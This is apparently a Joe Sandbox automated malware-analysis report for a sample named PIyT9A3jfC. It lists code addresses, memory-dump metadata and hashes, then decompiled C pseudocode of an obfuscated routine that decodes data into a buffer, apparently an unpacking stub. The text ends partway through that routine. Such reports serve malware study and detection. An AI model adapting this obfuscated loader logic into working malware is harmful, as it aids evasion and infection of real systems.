                                                                                                                                                                                                                                                                      0x011956ff
                                                                                                                                                                                                                                                                      0x01195702
                                                                                                                                                                                                                                                                      0x0119570c
                                                                                                                                                                                                                                                                      0x0119571e
                                                                                                                                                                                                                                                                      0x01195749
                                                                                                                                                                                                                                                                      0x0119576a
                                                                                                                                                                                                                                                                      0x01195770
                                                                                                                                                                                                                                                                      0x01195776
                                                                                                                                                                                                                                                                      0x0119577c
                                                                                                                                                                                                                                                                      0x0119578a
                                                                                                                                                                                                                                                                      0x01195790
                                                                                                                                                                                                                                                                      0x011957af
                                                                                                                                                                                                                                                                      0x011957b6
                                                                                                                                                                                                                                                                      0x011957bb
                                                                                                                                                                                                                                                                      0x011957c7
                                                                                                                                                                                                                                                                      0x011957ed
                                                                                                                                                                                                                                                                      0x011957f1
                                                                                                                                                                                                                                                                      0x011957fa
                                                                                                                                                                                                                                                                      0x011957fe
                                                                                                                                                                                                                                                                      0x0119580d
                                                                                                                                                                                                                                                                      0x01195813
                                                                                                                                                                                                                                                                      0x01195822
                                                                                                                                                                                                                                                                      0x0119582b
                                                                                                                                                                                                                                                                      0x01195830
                                                                                                                                                                                                                                                                      0x01195836
                                                                                                                                                                                                                                                                      0x0119583b
                                                                                                                                                                                                                                                                      0x0119583e
                                                                                                                                                                                                                                                                      0x01195847
                                                                                                                                                                                                                                                                      0x01195853
                                                                                                                                                                                                                                                                      0x0119585c
                                                                                                                                                                                                                                                                      0x0119586b
                                                                                                                                                                                                                                                                      0x0119586e
                                                                                                                                                                                                                                                                      0x01195878
                                                                                                                                                                                                                                                                      0x0119587e
                                                                                                                                                                                                                                                                      0x01195884
                                                                                                                                                                                                                                                                      0x0119588a
                                                                                                                                                                                                                                                                      0x011958b2
                                                                                                                                                                                                                                                                      0x011958da
                                                                                                                                                                                                                                                                      0x0119571b
                                                                                                                                                                                                                                                                      0x0119571b
                                                                                                                                                                                                                                                                      0x011958fd
                                                                                                                                                                                                                                                                      0x01195906
                                                                                                                                                                                                                                                                      0x01195912
                                                                                                                                                                                                                                                                      0x0119591d
                                                                                                                                                                                                                                                                      0x01195920
                                                                                                                                                                                                                                                                      0x01195926
                                                                                                                                                                                                                                                                      0x01195932
                                                                                                                                                                                                                                                                      0x0119593d
                                                                                                                                                                                                                                                                      0x01195949
                                                                                                                                                                                                                                                                      0x0119594f
                                                                                                                                                                                                                                                                      0x01195970
                                                                                                                                                                                                                                                                      0x01195983
                                                                                                                                                                                                                                                                      0x01195986
                                                                                                                                                                                                                                                                      0x01195993
                                                                                                                                                                                                                                                                      0x01195997
                                                                                                                                                                                                                                                                      0x0119599c
                                                                                                                                                                                                                                                                      0x0119599c
                                                                                                                                                                                                                                                                      0x011959a6
                                                                                                                                                                                                                                                                      0x011959b8
                                                                                                                                                                                                                                                                      0x011959b8
                                                                                                                                                                                                                                                                      0x011959bf
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x011959ee
                                                                                                                                                                                                                                                                      0x01195a01
                                                                                                                                                                                                                                                                      0x01195a0e
                                                                                                                                                                                                                                                                      0x01195a2b
                                                                                                                                                                                                                                                                      0x01195a31
                                                                                                                                                                                                                                                                      0x01195a37
                                                                                                                                                                                                                                                                      0x01195a3d
                                                                                                                                                                                                                                                                      0x01195a56
                                                                                                                                                                                                                                                                      0x01195a6b
                                                                                                                                                                                                                                                                      0x01195a71
                                                                                                                                                                                                                                                                      0x01195a88
                                                                                                                                                                                                                                                                      0x01195a8d
                                                                                                                                                                                                                                                                      0x01195aae
                                                                                                                                                                                                                                                                      0x01195ade
                                                                                                                                                                                                                                                                      0x01195af1
                                                                                                                                                                                                                                                                      0x01195af7
                                                                                                                                                                                                                                                                      0x01195afd
                                                                                                                                                                                                                                                                      0x01195b0c
                                                                                                                                                                                                                                                                      0x01195b29
                                                                                                                                                                                                                                                                      0x01195b40
                                                                                                                                                                                                                                                                      0x01195b59
                                                                                                                                                                                                                                                                      0x01195b5e
                                                                                                                                                                                                                                                                      0x01195b68
                                                                                                                                                                                                                                                                      0x01195b6e
                                                                                                                                                                                                                                                                      0x01195b7a
                                                                                                                                                                                                                                                                      0x01195b7d
                                                                                                                                                                                                                                                                      0x01195b82
                                                                                                                                                                                                                                                                      0x01195b88
                                                                                                                                                                                                                                                                      0x01195b8e
                                                                                                                                                                                                                                                                      0x01195ba0
                                                                                                                                                                                                                                                                      0x01195ba6
                                                                                                                                                                                                                                                                      0x01195ba9
                                                                                                                                                                                                                                                                      0x01195bb2
                                                                                                                                                                                                                                                                      0x01195bd2
                                                                                                                                                                                                                                                                      0x01195bd8
                                                                                                                                                                                                                                                                      0x01195bf8
                                                                                                                                                                                                                                                                      0x01195c0e
                                                                                                                                                                                                                                                                      0x01195c1d
                                                                                                                                                                                                                                                                      0x01195c3f
                                                                                                                                                                                                                                                                      0x011959b2
                                                                                                                                                                                                                                                                      0x011959b2
                                                                                                                                                                                                                                                                      0x011959b5
                                                                                                                                                                                                                                                                      0x011959b5
                                                                                                                                                                                                                                                                      0x01195c4a
                                                                                                                                                                                                                                                                      0x01195c59
                                                                                                                                                                                                                                                                      0x01195c7e
                                                                                                                                                                                                                                                                      0x01195c87
                                                                                                                                                                                                                                                                      0x01195c8d
                                                                                                                                                                                                                                                                      0x01195c93
                                                                                                                                                                                                                                                                      0x01195c99
                                                                                                                                                                                                                                                                      0x01195caa
                                                                                                                                                                                                                                                                      0x01195caf
                                                                                                                                                                                                                                                                      0x01195caf
                                                                                                                                                                                                                                                                      0x01195cb1
                                                                                                                                                                                                                                                                      0x01195cb1
                                                                                                                                                                                                                                                                      0x01195cb6
                                                                                                                                                                                                                                                                      0x01195e89
                                                                                                                                                                                                                                                                      0x01195e8c
                                                                                                                                                                                                                                                                      0x01195e8c
                                                                                                                                                                                                                                                                      0x01195e93

                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.815380758.0000000001181000.00000020.00000001.01000000.00000003.sdmp, Offset: 01180000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.815317551.0000000001180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.815648726.0000000001199000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.816245564.00000000011DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.817184209.000000000121D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.817258824.000000000121F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_1180000_PIyT9A3jfC.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                      • Opcode ID: e55bd9af9bb7f871877734f2ca4f4cf6c061370963761f859f79a6fc67557400
                                                                                                                                                                                                                                                                      • Instruction ID: 391eafde8f5cb5cfd52d74556269916d0f84cc0bc0402ed757fb678aa90ad79d
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e55bd9af9bb7f871877734f2ca4f4cf6c061370963761f859f79a6fc67557400
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4352DA74600209DFD718CF58E198BA9BBB6FB88304F54C26AE9599F349C734E942CF84
                                                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                                                                                                      			E01197440(intOrPtr _a4, intOrPtr _a8, signed int _a16, signed int _a24, intOrPtr _a28) {
                                                                                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                                                                                      				signed int _v12;
                                                                                                                                                                                                                                                                      				unsigned int _v16;
                                                                                                                                                                                                                                                                      				signed int _v20;
                                                                                                                                                                                                                                                                      				unsigned int _v24;
                                                                                                                                                                                                                                                                      				signed int _v28;
                                                                                                                                                                                                                                                                      				signed int _v32;
                                                                                                                                                                                                                                                                      				signed int _v36;
                                                                                                                                                                                                                                                                      				intOrPtr _v40;
                                                                                                                                                                                                                                                                      				intOrPtr _v44;
                                                                                                                                                                                                                                                                      				signed int _v48;
                                                                                                                                                                                                                                                                      				signed int _v52;
                                                                                                                                                                                                                                                                      				signed int _v56;
                                                                                                                                                                                                                                                                      				signed int _v60;
                                                                                                                                                                                                                                                                      				signed int _v64;
                                                                                                                                                                                                                                                                      				signed int _v68;
                                                                                                                                                                                                                                                                      				signed int _v72;
                                                                                                                                                                                                                                                                      				intOrPtr _v76;
                                                                                                                                                                                                                                                                      				signed int _v80;
                                                                                                                                                                                                                                                                      				intOrPtr _t419;
                                                                                                                                                                                                                                                                      				intOrPtr _t420;
                                                                                                                                                                                                                                                                      				intOrPtr _t423;
                                                                                                                                                                                                                                                                      				intOrPtr _t449;
                                                                                                                                                                                                                                                                      				intOrPtr _t462;
                                                                                                                                                                                                                                                                      				intOrPtr _t477;
                                                                                                                                                                                                                                                                      				intOrPtr _t492;
                                                                                                                                                                                                                                                                      				intOrPtr _t519;
                                                                                                                                                                                                                                                                      				intOrPtr _t534;
                                                                                                                                                                                                                                                                      				intOrPtr _t535;
                                                                                                                                                                                                                                                                      				intOrPtr _t537;
                                                                                                                                                                                                                                                                      				intOrPtr _t540;
                                                                                                                                                                                                                                                                      				intOrPtr _t544;
                                                                                                                                                                                                                                                                      				signed int _t553;
                                                                                                                                                                                                                                                                      				intOrPtr _t569;
                                                                                                                                                                                                                                                                      				intOrPtr _t571;
                                                                                                                                                                                                                                                                      				intOrPtr _t588;
                                                                                                                                                                                                                                                                      				intOrPtr _t596;
                                                                                                                                                                                                                                                                      				intOrPtr _t618;
                                                                                                                                                                                                                                                                      				intOrPtr _t625;
                                                                                                                                                                                                                                                                      				intOrPtr _t634;
                                                                                                                                                                                                                                                                      				intOrPtr _t637;
                                                                                                                                                                                                                                                                      				intOrPtr _t643;
                                                                                                                                                                                                                                                                      				intOrPtr _t663;
                                                                                                                                                                                                                                                                      				intOrPtr _t679;
                                                                                                                                                                                                                                                                      				intOrPtr _t683;
                                                                                                                                                                                                                                                                      				intOrPtr _t689;
                                                                                                                                                                                                                                                                      				intOrPtr _t691;
                                                                                                                                                                                                                                                                      				intOrPtr _t692;
                                                                                                                                                                                                                                                                      				intOrPtr _t693;
                                                                                                                                                                                                                                                                      				intOrPtr _t694;
                                                                                                                                                                                                                                                                      				intOrPtr _t696;
                                                                                                                                                                                                                                                                      				intOrPtr _t740;
                                                                                                                                                                                                                                                                      				intOrPtr _t750;
                                                                                                                                                                                                                                                                      				intOrPtr _t757;
                                                                                                                                                                                                                                                                      				intOrPtr _t759;
                                                                                                                                                                                                                                                                      				intOrPtr _t770;
                                                                                                                                                                                                                                                                      				intOrPtr _t780;
                                                                                                                                                                                                                                                                      				intOrPtr _t806;
                                                                                                                                                                                                                                                                      				intOrPtr _t824;
                                                                                                                                                                                                                                                                      				intOrPtr _t828;
                                                                                                                                                                                                                                                                      				intOrPtr _t829;
                                                                                                                                                                                                                                                                      				intOrPtr _t831;
                                                                                                                                                                                                                                                                      				signed int _t836;
                                                                                                                                                                                                                                                                      				intOrPtr _t856;
                                                                                                                                                                                                                                                                      				intOrPtr _t857;
                                                                                                                                                                                                                                                                      				intOrPtr _t860;
                                                                                                                                                                                                                                                                      				intOrPtr _t864;
                                                                                                                                                                                                                                                                      				intOrPtr _t865;
                                                                                                                                                                                                                                                                      				intOrPtr _t873;
                                                                                                                                                                                                                                                                      				intOrPtr _t877;
                                                                                                                                                                                                                                                                      				intOrPtr _t879;
                                                                                                                                                                                                                                                                      				intOrPtr _t880;
                                                                                                                                                                                                                                                                      
                                                                                                                                                                                                                                                                      				_v12 = _a16 ^ 0x000027b9;
                                                                                                                                                                                                                                                                      				_v48 = _a8 - 0x5d;
                                                                                                                                                                                                                                                                      				_v80 = _a24 ^ 0x00000236;
                                                                                                                                                                                                                                                                      				_v20 = _a8 - 0xd1;
                                                                                                                                                                                                                                                                      				_v52 = _a4 + 0x41;
                                                                                                                                                                                                                                                                      				_v40 = _a8 + 0x221;
                                                                                                                                                                                                                                                                      				_v8 = _a24;
                                                                                                                                                                                                                                                                      				if(_v12 == _v48 + 0x65) {
                                                                                                                                                                                                                                                                      					if(_v12 <=  *((intOrPtr*)(_a28 + 0x9c)) +  *((intOrPtr*)(_a28 + 0x10)) - 0x2674) {
                                                                                                                                                                                                                                                                      						_v44 =  *0x01DCB261;
                                                                                                                                                                                                                                                                      						while(_v44 < ((_v8 | _v20) ^  *(_a28 + 0xfc))) {
                                                                                                                                                                                                                                                                      							_v8 =  *((intOrPtr*)(_a28 + 0x30)) - _v20 & 0x00002796 | _v8;
                                                                                                                                                                                                                                                                      							_v44 = _v44 + 1;
                                                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                                                                                      						_t806 =  *0x121d5ec; // 0x121d5f0
                                                                                                                                                                                                                                                                      						_t128 = _t806 + 0xdc; // 0x8
                                                                                                                                                                                                                                                                      						if( *((intOrPtr*)(_a28 + 0x4c)) >= ( *(_a28 + 0xbadc51) &  *0x121d628 &  *_t128)) {
                                                                                                                                                                                                                                                                      							if(_v12 < _v12 +  *((intOrPtr*)(_a28 + 0x9c)) - 0x2801) {
                                                                                                                                                                                                                                                                      								 *(_a28 + 0x8c) =  *(_a28 + 0x8c) -  *((intOrPtr*)(_a28 + 0x50)) - 0x2796;
                                                                                                                                                                                                                                                                      							}
                                                                                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                                                                                      							if(_v12 >= (_v52 - _v40 | 0x000026d4)) {
                                                                                                                                                                                                                                                                      								_t663 =  *0x121d5ec; // 0x121d5f0
                                                                                                                                                                                                                                                                      								_v76 = _t663;
                                                                                                                                                                                                                                                                      								_t492 =  *0x121d5ec; // 0x121d5f0
                                                                                                                                                                                                                                                                      								_v72 = ( *(_a28 + 0xbadc29) | _v52) *  *(_t492 + 0xbadc71);
                                                                                                                                                                                                                                                                      								_v68 = _v8 + 0x2598;
                                                                                                                                                                                                                                                                      								_v64 = _v40 + 0x00002796 ^  *(_a28 + 0xf4);
                                                                                                                                                                                                                                                                      								_v60 = _v48 *  *(_a28 + 0xbadbfd);
                                                                                                                                                                                                                                                                      								_v56 = ( *(_a28 + 0xdc) | 0x00002622) &  *0x0121D6C4;
                                                                                                                                                                                                                                                                      								_v40 = E01182800(_v76, _v72, _v68, _v64, _v60, _v56);
                                                                                                                                                                                                                                                                      								_t824 =  *0x121d5ec; // 0x121d5f0
                                                                                                                                                                                                                                                                      								_t165 = _t824 + 0xe4; // 0xc
                                                                                                                                                                                                                                                                      								_v20 =  *_t165 * 0x2674 * _v20;
                                                                                                                                                                                                                                                                      								 *((intOrPtr*)(_a28 + 0xd0)) = (_v8 & 0x000027b9 ^ _v20) +  *((intOrPtr*)(_a28 + 0xd0));
                                                                                                                                                                                                                                                                      							}
                                                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                                                                                      					_t828 =  *0x121d5ec; // 0x121d5f0
                                                                                                                                                                                                                                                                      					 *((intOrPtr*)(_t828 + 0x88)) = 0x11d0140;
                                                                                                                                                                                                                                                                      					_v32 = 0;
                                                                                                                                                                                                                                                                      					while(_v32 < 0x564) {
                                                                                                                                                                                                                                                                      						_v16 =  *((intOrPtr*)( *((intOrPtr*)(_a28 + 0x88)) + _v32 * 4));
                                                                                                                                                                                                                                                                      						_t831 =  *0x121d5ec; // 0x121d5f0
                                                                                                                                                                                                                                                                      						_t29 = _t831 + 0x58; // 0xc4ec4ec5
                                                                                                                                                                                                                                                                      						_v16 = _v16 *  *_t29;
                                                                                                                                                                                                                                                                      						_t683 =  *0x121d5ec; // 0x121d5f0
                                                                                                                                                                                                                                                                      						 *0x121d6dc = ( *(_a28 + 0x78) ^  *(_t683 + 0xa4)) - 0x00079aca ^  *0x121d6dc;
                                                                                                                                                                                                                                                                      						 *0x01DCB271 =  *((intOrPtr*)(0x1dcb271)) -  *0x0121D694;
                                                                                                                                                                                                                                                                      						_t836 =  *0x121d6dc; // 0xe608d
                                                                                                                                                                                                                                                                      						_t519 =  *0x121d5ec; // 0x121d5f0
                                                                                                                                                                                                                                                                      						_t41 = _t519 + 0xac; // 0x1a0e74
                                                                                                                                                                                                                                                                      						_t689 =  *0x121d5ec; // 0x121d5f0
                                                                                                                                                                                                                                                                      						 *(_t689 + 0xac) = (_t836 ^  *(_a28 + 0xbadbfd)) - 0x001f219a |  *_t41;
                                                                                                                                                                                                                                                                      						_t879 =  *0x121d5ec; // 0x121d5f0
                                                                                                                                                                                                                                                                      						_t691 =  *0x121d5ec; // 0x121d5f0
                                                                                                                                                                                                                                                                      						_t692 =  *0x121d5ec; // 0x121d5f0
                                                                                                                                                                                                                                                                      						 *(_t692 + 0xbadbfd) = ( *(_a28 + 0xac) ^  *(_t879 + 0xa4)) - 0x001a0e74 ^  *(_t691 + 0xbadbfd);
                                                                                                                                                                                                                                                                      						_t693 =  *0x121d5ec; // 0x121d5f0
                                                                                                                                                                                                                                                                      						_t51 = _t693 + 0xdc; // 0x8
                                                                                                                                                                                                                                                                      						_t694 =  *0x121d5ec; // 0x121d5f0
                                                                                                                                                                                                                                                                      						_t696 =  *0x121d5ec; // 0x121d5f0
                                                                                                                                                                                                                                                                      						 *((intOrPtr*)(_t696 + 0xb8)) =  *((intOrPtr*)(_t694 + 0xb8)) -  *_t51 - 8;
                                                                                                                                                                                                                                                                      						 *((intOrPtr*)(_a28 + 0xbadbdd)) =  *((intOrPtr*)(_a28 + 0xec)) +  *((intOrPtr*)(_a28 + 0xbadbdd)) - 0xe608d;
                                                                                                                                                                                                                                                                      						_t880 =  *0x121d68c; // 0x14b95e
                                                                                                                                                                                                                                                                      						_t534 =  *0x121d5ec; // 0x121d5f0
                                                                                                                                                                                                                                                                      						_t535 =  *0x121d5ec; // 0x121d5f0
                                                                                                                                                                                                                                                                      						 *(_t535 + 0xa4) = _t880 -  *(_a28 + 0xb8) - 0x0018e850 |  *(_t534 + 0xa4);
                                                                                                                                                                                                                                                                      						_t856 =  *0x121d64c; // 0x4b420
                                                                                                                                                                                                                                                                      						 *((char*)( *((intOrPtr*)(_a28 + 0x90)) + _t856)) = _v16 >> 0x10;
                                                                                                                                                                                                                                                                      						_t537 =  *0x121d64c; // 0x4b420
                                                                                                                                                                                                                                                                      						 *0x121d64c = _t537 + 1;
                                                                                                                                                                                                                                                                      						_t857 =  *0x121d5ec; // 0x121d5f0
                                                                                                                                                                                                                                                                      						_t78 = _t857 + 0x5c; // 0x4b420
                                                                                                                                                                                                                                                                      						 *((char*)( *((intOrPtr*)(_a28 + 0x90)) +  *_t78)) = _v16 >> 8;
                                                                                                                                                                                                                                                                      						_t540 =  *0x121d5ec; // 0x121d5f0
                                                                                                                                                                                                                                                                      						_t82 = _t540 + 0x5c; // 0x4b420
                                                                                                                                                                                                                                                                      						_t860 =  *0x121d5ec; // 0x121d5f0
                                                                                                                                                                                                                                                                      						 *((intOrPtr*)(_t860 + 0x5c)) =  *_t82 + 1;
                                                                                                                                                                                                                                                                      						 *((char*)( *((intOrPtr*)(_a28 + 0x90)) +  *((intOrPtr*)(_a28 + 0x5c)))) = _v16;
                                                                                                                                                                                                                                                                      						 *((intOrPtr*)(_a28 + 0x5c)) =  *((intOrPtr*)(_a28 + 0x5c)) + 1;
                                                                                                                                                                                                                                                                      						_t544 =  *0x121d5ec; // 0x121d5f0
                                                                                                                                                                                                                                                                      						_t94 = _t544 + 0x3c; // 0x161485
                                                                                                                                                                                                                                                                      						_t864 =  *0x121d5ec; // 0x121d5f0
                                                                                                                                                                                                                                                                      						_t95 = _t864 + 0xe4; // 0xc
                                                                                                                                                                                                                                                                      						_t865 =  *0x121d5ec; // 0x121d5f0
                                                                                                                                                                                                                                                                      						 *((intOrPtr*)(_t865 + 0xe4)) =  *_t94 +  *_t95 - 0x161485;
                                                                                                                                                                                                                                                                      						 *(_a28 + 0xa4) =  *(_a28 + 0xa4) -  *((intOrPtr*)(0x1dcb261)) -  *0x01DCB1CD;
                                                                                                                                                                                                                                                                      						_t873 =  *0x121d5ec; // 0x121d5f0
                                                                                                                                                                                                                                                                      						_t553 =  *0x121d6a4; // 0x0
                                                                                                                                                                                                                                                                      						 *0x121d6a4 = _t553 -  *((intOrPtr*)(_a28 + 0xec)) +  *((intOrPtr*)(_t873 + 0x10)) - 0xe6097;
                                                                                                                                                                                                                                                                      						_v32 = _v32 + 1;
                                                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                                                      					 *((intOrPtr*)(_a28 + 0x58)) = 0x1ecc;
                                                                                                                                                                                                                                                                      					_t829 =  *0x121d5ec; // 0x121d5f0
                                                                                                                                                                                                                                                                      					_t115 = _t829 + 0x58; // 0xc4ec4ec5
                                                                                                                                                                                                                                                                      					_t679 =  *0x121d5ec; // 0x121d5f0
                                                                                                                                                                                                                                                                      					 *((intOrPtr*)(_t679 + 0x58)) =  *_t115 - 0x4f6;
                                                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                                                      				if(_v8 > _v12 + 0x2598) {
                                                                                                                                                                                                                                                                      					if(_v8 < (_v12 ^ 0x000025a0)) {
                                                                                                                                                                                                                                                                      						if( *((intOrPtr*)(_a28 + 0xbadbed)) >= (_v8 - 0x2633) *  *(_a28 + 0xb4)) {
                                                                                                                                                                                                                                                                      							 *0x01DCB1B1 = _v48 +  *((intOrPtr*)(0x1dcb1b1)) - 0x27b9;
                                                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                                                                                      						_t643 =  *0x121d5ec; // 0x121d5f0
                                                                                                                                                                                                                                                                      						_t209 = _t643 + 0xec; // 0xe608d
                                                                                                                                                                                                                                                                      						 *((intOrPtr*)(_a28 + 0x58)) =  *((intOrPtr*)(_a28 + 0x58)) - ( *_t209 ^ 0x3b1dab9c);
                                                                                                                                                                                                                                                                      						 *((intOrPtr*)(_a28 + 0x88)) = 0x119c430;
                                                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                                                      					if(_v52 != (_v8 ^ 0x00000d9a)) {
                                                                                                                                                                                                                                                                      						_v36 = 0;
                                                                                                                                                                                                                                                                      						while(_v36 < 0xea8) {
                                                                                                                                                                                                                                                                      							 *0x0121D6A8 =  *(_a28 + 0xbadbfd) -  *((intOrPtr*)(_a28 + 0x74)) - 0x00114117 |  *0x0121D6A8;
                                                                                                                                                                                                                                                                      							 *(_a28 + 0xac) = ( *(_a28 + 0xb8) ^ 0xfffbd10e) +  *(_a28 + 0xac);
                                                                                                                                                                                                                                                                      							_v24 =  *((intOrPtr*)( *((intOrPtr*)(_a28 + 0x88)) + _v36 * 4));
                                                                                                                                                                                                                                                                      							_t770 =  *0x121d5ec; // 0x121d5f0
                                                                                                                                                                                                                                                                      							_t255 = _t770 + 0x58; // 0xc4ec4ec5
                                                                                                                                                                                                                                                                      							_v24 = _v24 *  *_t255;
                                                                                                                                                                                                                                                                      							_t449 =  *0x121d5ec; // 0x121d5f0
                                                                                                                                                                                                                                                                      							_t258 = _t449 + 0xf4; // 0xd3256746
                                                                                                                                                                                                                                                                      							 *(_a28 + 0xe4) =  *_t258 -  *((intOrPtr*)(_a28 + 0x7c)) + 0x2cda98c4 ^  *(_a28 + 0xe4);
                                                                                                                                                                                                                                                                      							 *((char*)( *((intOrPtr*)(_a28 + 0x90)) +  *((intOrPtr*)(_a28 + 0x5c)))) = _v24 >> 0x10;
                                                                                                                                                                                                                                                                      							 *((intOrPtr*)(_a28 + 0x5c)) =  *((intOrPtr*)(_a28 + 0x5c)) + 1;
                                                                                                                                                                                                                                                                      							 *((char*)( *((intOrPtr*)(_a28 + 0x90)) +  *((intOrPtr*)(_a28 + 0x5c)))) = _v24 >> 8;
                                                                                                                                                                                                                                                                      							 *((intOrPtr*)(_a28 + 0x5c)) =  *((intOrPtr*)(_a28 + 0x5c)) + 1;
                                                                                                                                                                                                                                                                      							_t618 =  *0x121d5ec; // 0x121d5f0
                                                                                                                                                                                                                                                                      							_t285 = _t618 + 0x90; // 0x1452000
                                                                                                                                                                                                                                                                      							_t462 =  *0x121d64c; // 0x4b420
                                                                                                                                                                                                                                                                      							 *((char*)( *_t285 + _t462)) = _v24;
                                                                                                                                                                                                                                                                      							_t780 =  *0x121d64c; // 0x4b420
                                                                                                                                                                                                                                                                      							 *0x121d64c = _t780 + 1;
                                                                                                                                                                                                                                                                      							 *0x121d6e4 = ( *((intOrPtr*)(_a28 + 0x40)) -  *((intOrPtr*)(_a28 + 0xe0)) ^ 0x001ed730) +  *0x121d6e4;
                                                                                                                                                                                                                                                                      							_t625 =  *0x121d5ec; // 0x121d5f0
                                                                                                                                                                                                                                                                      							_t293 = _t625 + 0xec; // 0xe608d
                                                                                                                                                                                                                                                                      							 *(_a28 + 0xe4) =  *_t293 +  *0x0121D66C +  *(_a28 + 0xe4) - 0xe6097;
                                                                                                                                                                                                                                                                      							_t877 =  *0x121d5ec; // 0x121d5f0
                                                                                                                                                                                                                                                                      							 *0x0121D6A8 =  *((intOrPtr*)(_t877 + 0x7c)) +  *(_a28 + 0xa4) - 0x0000000a |  *0x0121D6A8;
                                                                                                                                                                                                                                                                      							 *(_a28 + 0xdc) =  *(_a28 + 0xdc) -  *0x121d6a4;
                                                                                                                                                                                                                                                                      							_t634 =  *0x121d5ec; // 0x121d5f0
                                                                                                                                                                                                                                                                      							_t317 = _t634 + 0xb0; // 0x0
                                                                                                                                                                                                                                                                      							 *(_a28 + 0xa4) =  *(_a28 + 0xa4) ^  *_t317;
                                                                                                                                                                                                                                                                      							_t477 =  *0x121d5ec; // 0x121d5f0
                                                                                                                                                                                                                                                                      							_t323 = _t477 + 0xb0; // 0x0
                                                                                                                                                                                                                                                                      							_t637 =  *0x121d5ec; // 0x121d5f0
                                                                                                                                                                                                                                                                      							 *(_t637 + 0xb0) = ( *(_a28 + 0xe4) - 0xb) *  *_t323;
                                                                                                                                                                                                                                                                      							_v36 = _v36 + 1;
                                                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                                                      						_t569 =  *0x121d5ec; // 0x121d5f0
                                                                                                                                                                                                                                                                      						_t326 = _t569 + 0xac; // 0x1a0e74
                                                                                                                                                                                                                                                                      						if( *_t326 >=  *((intOrPtr*)(_a28 + 0x40))) {
                                                                                                                                                                                                                                                                      							_t571 =  *0x121d5ec; // 0x121d5f0
                                                                                                                                                                                                                                                                      							 *(_a28 + 0x38) =  *((intOrPtr*)(_t571 + 0xbadbdd)) +  *((intOrPtr*)(_a28 + 0x3c)) +  *(_a28 + 0x38);
                                                                                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                                                                                      							 *((intOrPtr*)(_a28 + 0xe8)) = 0x121d5f0;
                                                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                                                      						_v12 = _v12 ^ 0x00002598;
                                                                                                                                                                                                                                                                      						_v28 = 0;
                                                                                                                                                                                                                                                                      						while(_v28 < 0x2722) {
                                                                                                                                                                                                                                                                      							_t419 =  *0x121d5ec; // 0x121d5f0
                                                                                                                                                                                                                                                                      							_t345 = _t419 + 0x94; // 0x1452000
                                                                                                                                                                                                                                                                      							_t420 =  *0x121d5ec; // 0x121d5f0
                                                                                                                                                                                                                                                                      							_t349 = _t420 + 0x60; // 0xb67e4e55
                                                                                                                                                                                                                                                                      							_t740 =  *0x121d5ec; // 0x121d5f0
                                                                                                                                                                                                                                                                      							_t350 = _t740 + 0x94; // 0x1452000
                                                                                                                                                                                                                                                                      							 *( *_t350 + _v28 * 4) =  *( *_t345 + _v28 * 4) ^  *_t349;
                                                                                                                                                                                                                                                                      							 *((intOrPtr*)(_a28 + 0x60)) =  *((intOrPtr*)(_a28 + 0x60)) +  *0x121d688;
                                                                                                                                                                                                                                                                      							_t423 =  *0x121d668; // 0x79aca
                                                                                                                                                                                                                                                                      							 *((intOrPtr*)(_a28 + 0x3c)) =  *((intOrPtr*)(_a28 + 0x3c)) - _t423 - 0x79aca;
                                                                                                                                                                                                                                                                      							 *(_a28 + 0x8c) =  *(_a28 + 0xa4) +  *(_a28 + 0xdc) ^ 0x00000008 ^  *(_a28 + 0x8c);
                                                                                                                                                                                                                                                                      							_t750 =  *0x121d5ec; // 0x121d5f0
                                                                                                                                                                                                                                                                      							_t588 =  *0x121d5ec; // 0x121d5f0
                                                                                                                                                                                                                                                                      							 *(_t588 + 0x7c) = ( *((intOrPtr*)(_a28 + 0x40)) - 0x1d118a) *  *(_t750 + 0x7c);
                                                                                                                                                                                                                                                                      							 *((intOrPtr*)(_a28 + 0x10)) = ( *(_a28 + 0x38) ^ 0x00000001) +  *((intOrPtr*)(_a28 + 0x10));
                                                                                                                                                                                                                                                                      							_t757 =  *0x121d5ec; // 0x121d5f0
                                                                                                                                                                                                                                                                      							 *0x121d6a4 = ( *((intOrPtr*)(0x121d66c)) +  *((intOrPtr*)(_t757 + 0xbadc71)) - 0xa) *  *0x121d6a4;
                                                                                                                                                                                                                                                                      							_t596 =  *0x121d5ec; // 0x121d5f0
                                                                                                                                                                                                                                                                      							_t393 = _t596 + 0xec; // 0xe608d
                                                                                                                                                                                                                                                                      							_t759 =  *0x121d5ec; // 0x121d5f0
